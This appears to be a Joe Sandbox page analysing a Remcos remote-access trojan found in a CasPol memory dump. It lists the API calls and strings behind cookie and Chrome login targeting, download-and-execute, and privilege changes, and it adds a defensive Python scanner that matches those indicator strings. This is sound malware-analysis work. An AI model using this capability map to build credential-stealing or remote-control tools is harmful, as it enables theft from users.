• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
• IsValidCodePage.KERNEL32(00000000), ref: 004527F7
• IsValidLocale.KERNEL32(?,00000001), ref: 00452806
• GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
• GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: JD$JD$JD
• API String ID: 745075371-3517165026
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• FindClose.KERNEL32(00000000), ref: 0040C4E3
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
APIs
• RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
• RegCloseKey.ADVAPI32(?), ref: 004140E4
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
• GetProcAddress.KERNEL32(00000000), ref: 004142AC
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
APIs
• _free.LIBCMT ref: 00449292
• _free.LIBCMT ref: 004492B6
• _free.LIBCMT ref: 0044943D
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
• _free.LIBCMT ref: 00449609
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
                                                                                                                                                                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                                                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                                                                                                          • String ID: `XG$`XG$h]v$h}v
                                                                                                                                                                          • API String ID: 341183262-1394002874
                                                                                                                                                                          • Opcode ID: f455fec234fb88beee6ba430f665805b6b71df17feba6dd7292f0e9b07eae81b
                                                                                                                                                                          • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                                                                                                                                          • Opcode Fuzzy Hash: f455fec234fb88beee6ba430f665805b6b71df17feba6dd7292f0e9b07eae81b
                                                                                                                                                                          • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                          • API String ID: 1589313981-2876530381
                                                                                                                                                                          • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                                          Strings
                                                                                                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                          • API String ID: 2018770650-1062637481
                                                                                                                                                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
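The two function summaries above, the SeShutdownPrivilege / PowrProf.dll / SetSuspendState routine and the routine that calls DeleteFileA on Chrome's `Login Data` and logs "[Chrome StoredLogins found, cleared!]", show that Remcos keeps these capability strings in plaintext inside the 0x400000 image recovered from the CasPol memory dump. The helper below is an added example for this page, not Joe Sandbox or Remcos code: it scans a raw memory dump for exactly those strings, in both 8-bit and UTF-16LE form (the report lists A and W API variants in the same image), and reports which capability group is present. The indicator strings are copied from the report; the group names, the `Hit` type, the threshold logic and the sample blob are the example's own constructs.

```python
"""Triage helper for raw memory dumps: look for the plaintext capability
strings that the Remcos function summaries above expose.

Added example for this report page; it is not Joe Sandbox or Remcos code.
Indicator strings are copied from the report; group names, the Hit type
and the sample blob are this example's own constructs.
"""
from dataclasses import dataclass
from typing import Dict, List

# Narrow strings exactly as listed in the report's "Strings" entries.
# Raw string literals keep the path backslashes literal.
INDICATORS: Dict[str, List[str]] = {
    # DeleteFileA on the Chrome credential store plus its two status messages
    "chrome_login_wipe": [
        r"\AppData\Local\Google\Chrome\User Data\Default\Login Data",
        "[Chrome StoredLogins found, cleared!]",
        "[Chrome StoredLogins not found]",
    ],
    # AdjustTokenPrivileges, then ExitWindowsEx / SetSuspendState via PowrProf.dll
    "shutdown_or_suspend": [
        "SeShutdownPrivilege",
        "PowrProf.dll",
        "SetSuspendState",
    ],
}


@dataclass(frozen=True)
class Hit:
    group: str      # key of INDICATORS
    needle: str     # the indicator string that matched
    encoding: str   # "ascii" or "utf-16le"
    offset: int     # byte offset of the match inside the dump


def _find_all(data: bytes, needle: bytes) -> List[int]:
    """Every byte offset at which needle occurs in data."""
    offsets: List[int] = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def scan_dump(data: bytes) -> List[Hit]:
    """Search for each indicator as an 8-bit string and as UTF-16LE.

    A narrow-only search would miss wide copies of the same strings,
    which matter because this image mixes A and W API variants.
    """
    hits: List[Hit] = []
    for group, needles in INDICATORS.items():
        for needle in needles:
            for enc in ("ascii", "utf-16le"):
                for off in _find_all(data, needle.encode(enc)):
                    hits.append(Hit(group, needle, enc, off))
    return sorted(hits, key=lambda h: h.offset)


def capabilities(hits: List[Hit], min_fraction: float = 1.0) -> Dict[str, bool]:
    """Map each group to True when at least min_fraction of its distinct
    indicators were seen. 1.0 demands every string; lower it for partial
    dumps where a page of the image is missing."""
    result: Dict[str, bool] = {}
    for group, needles in INDICATORS.items():
        seen = {h.needle for h in hits if h.group == group}
        result[group] = len(seen) >= min_fraction * len(needles)
    return result


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dump; NOT bytes from the real sample.

    SetSuspendState is deliberately left out so the threshold logic shows.
    """
    blob = bytearray(b"\x00" * 64)
    blob += b"UserProfile\x00"
    blob += INDICATORS["chrome_login_wipe"][0].encode("ascii") + b"\x00"
    blob += b"\xcc" * 32
    blob += "[Chrome StoredLogins found, cleared!]".encode("utf-16le") + b"\x00\x00"
    blob += b"[Chrome StoredLogins not found]\x00"
    blob += b"\x90" * 16
    blob += b"SeShutdownPrivilege\x00PowrProf.dll\x00"
    return bytes(blob)


if __name__ == "__main__":
    import sys

    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    for hit in scan_dump(data):
        print(f"{hit.offset:#010x} {hit.encoding:<8} {hit.group:<20} {hit.needle}")
    print(capabilities(scan_dump(data), min_fraction=0.5))
```

Run it against a dumped region (`python scan_remcos_strings.py region.bin`) to get offsets you can cross-check with the `xrefs` addresses listed in the report. Note that the Chrome routine deletes the `Login Data` file rather than reading it, so on a suspected host the absence of `%UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Login Data` while the rest of the profile is intact is itself a finding worth recording.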
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
• OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
• GetLastError.KERNEL32 ref: 004179D8
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
• Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
APIs
• __EH_prolog.LIBCMT ref: 00409293
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
• FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
• FindClose.KERNEL32(00000000), ref: 004093FC
  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
• FindClose.KERNEL32(00000000), ref: 004095F4
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
• String ID:
• API String ID: 1824512719-0
• Opcode ID: 4f59db4eab98a7b62ba9f6616cb54e6cadf5fa6bc43d1ac28df0b82becba1c42
• Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
• Opcode Fuzzy Hash: 4f59db4eab98a7b62ba9f6616cb54e6cadf5fa6bc43d1ac28df0b82becba1c42
• Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
• GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
• Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
• Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
• Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
• LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
• LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
• SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
• Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
• Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
• Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
APIs
• __EH_prolog.LIBCMT ref: 004096A5
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
• FindNextFileW.KERNEL32(00000000,?), ref: 00409746
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 1c61502dcddb6f1c338862b57ec77496ec5ca45208db4d87175f1e85b34456af
• Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
• Opcode Fuzzy Hash: 1c61502dcddb6f1c338862b57ec77496ec5ca45208db4d87175f1e85b34456af
• Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
APIs
• __EH_prolog.LIBCMT ref: 0040884C
• FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: 230b96d798be498e9ef8a6d6c6662c70d8d15ac88f5c0912f345ddef500bd3b7
• Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
• Opcode Fuzzy Hash: 230b96d798be498e9ef8a6d6c6662c70d8d15ac88f5c0912f345ddef500bd3b7
• Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
• API String ID: 2825088817-4197237851
• Opcode ID: 1598f39350d4de776a2c4df0b22db1491b56135c48faa30bf3a2a552642789bc
• Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
• Opcode Fuzzy Hash: 1598f39350d4de776a2c4df0b22db1491b56135c48faa30bf3a2a552642789bc
• Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: hPG$hPG
• API String ID: 4113138495-4177492676
• Opcode ID: b2caad42cb92f6822f0d3a262e4a0aa5abacc01a08b3a6296b6e41a9c19c353f
• Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
• Opcode Fuzzy Hash: b2caad42cb92f6822f0d3a262e4a0aa5abacc01a08b3a6296b6e41a9c19c353f
• Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
